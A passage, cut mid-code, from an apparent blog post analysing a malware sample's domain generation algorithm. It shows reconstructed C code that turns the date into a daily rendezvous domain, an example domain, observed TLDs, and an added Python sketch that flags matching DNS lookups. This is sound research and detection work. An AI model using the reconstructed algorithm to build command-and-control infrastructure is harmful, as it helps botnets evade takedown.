<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> month1 = ((month1 ^</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">4</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">* month1) >> </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">25</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) ^</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">16</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">* (month1 &</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0xFFFFFFF8</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> year1 = ((year1 ^</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">8</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> * year1) >></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">11</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) ^ ((year1 & </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0xFFFFFFF0</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">17</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> domain[i] = ((year1 ^ month1 ^ day1) % </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">25</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">) +</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">97</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">}</span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="white-space: normal;"><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">printf(</span></span><span style="color: #d62b24;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"Domain: %s \n"</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">, (</span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">char</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">*)domain);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> }</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span style="color: #bf2e9d;"><span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">int</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">main(</span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">void</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">{</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="white-space: normal;"><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">GenDomain();</span></span></div>
<div style="color: #bf2e9d; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span style="color: black;"><span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="color: #008326; white-space: normal;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">return</span><span style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0</span></span><span style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">}</span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<div style="color: #008326; font-family: Menlo; font-size: 11px;">
<span class="Apple-style-span" style="color: black; font-family: Helvetica; font-size: 12px;"><br /></span></div>
<div style="color: #008326; font-family: Menlo; font-size: 11px;">
<span style="color: black;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">In short, the routine derives a string of characters from the current date (day, month and year), so that a new domain is generated and contacted every day.</span></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<div style="color: #008326;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">For example, the domain of the day (12/04/2012) is:</span></span></div>
<br />
<span class="Apple-style-span" style="color: #274e13;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Domain: fhnqskxxwloxl</span></span><br />
<br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Note that this routine generates only the domain name, not the TLD. The TLDs used by the malware appear to be stored encrypted with strong encryption, under a key that is generated uniquely on the infected machine at install time, so I am unable to recover them: I have only the payload, not the full installer.</span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">A little research on Google nonetheless suggests that the following TLDs have been observed in the wild:</span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">.com</span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">.net</span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">.kz</span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">.in</span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">.info</span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Now that the domain generation algorithm is demystified, you can try to register one of the domains (if you can find one still available!) and perform your own traffic analysis!</span></span></div>
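<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Added example, not code from the original post: once the generator is known, a defender can precompute the labels it will emit over a window of dates, cross them with the observed TLDs and match DNS query logs against that set. It assumes a constructed <i>stand_in_dga</i> placeholder with <i>GenDomain</i>'s shape (day, month, year in, label out) that is not the malware's algorithm, and constructed dnsmasq-style log lines; substitute the real routine to get actionable domains.</span></div>

```python
from datetime import date, timedelta
import re

OBSERVED_TLDS = ("com", "net", "kz", "in", "info")  # TLDs listed in the post

def stand_in_dga(day: int, month: int, year: int) -> str:
    """Constructed placeholder with GenDomain's shape (date in, label out); NOT
    the malware's algorithm. An LCG seeded from the date gives a 13-letter label."""
    state = year * 10000 + month * 100 + day
    label = []
    for _ in range(13):
        state = (1103515245 * state + 12345) & 0x7FFFFFFF
        label.append(chr(ord("a") + (state >> 16) % 26))
    return "".join(label)

def candidate_domains(center: date, window: int = 3, dga=stand_in_dga) -> set:
    """Labels for center +/- window days crossed with the observed TLDs; the
    window absorbs clock skew between the analyst and infected hosts."""
    out = set()
    for off in range(-window, window + 1):
        d = center + timedelta(days=off)
        label = dga(d.day, d.month, d.year)
        out.update(f"{label}.{tld}" for tld in OBSERVED_TLDS)
    return out

# dnsmasq-style "query[A] <name> from <client>" lines
QUERY_RE = re.compile(r"query\[A\]\s+(?P<qname>\S+)\s+from\s+(?P<client>\S+)")

def flag_dga_lookups(log_lines, candidates: set) -> list:
    """Return (client, qname) for every query whose name is a DGA candidate."""
    hits = []
    for line in log_lines:
        m = QUERY_RE.search(line)
        qname = m.group("qname").lower().rstrip(".") if m else None
        if qname in candidates:
            hits.append((m.group("client"), qname))
    return hits

def demo() -> list:
    """Constructed log sample: line two queries the stand-in label for
    12 April 2012 (the post's example date) under the .kz TLD."""
    label = stand_in_dga(12, 4, 2012)
    sample = [
        "Apr 12 09:14:01 dnsmasq[812]: query[A] www.example.com from 10.0.0.7",
        f"Apr 12 09:14:03 dnsmasq[812]: query[A] {label}.kz. from 10.0.0.23",
        "Apr 12 09:14:09 dnsmasq[812]: query[A] mail.example.net from 10.0.0.7",
    ]
    return flag_dga_lookups(sample, candidate_domains(date(2012, 4, 12)))
```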
</span><br />
<br />giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0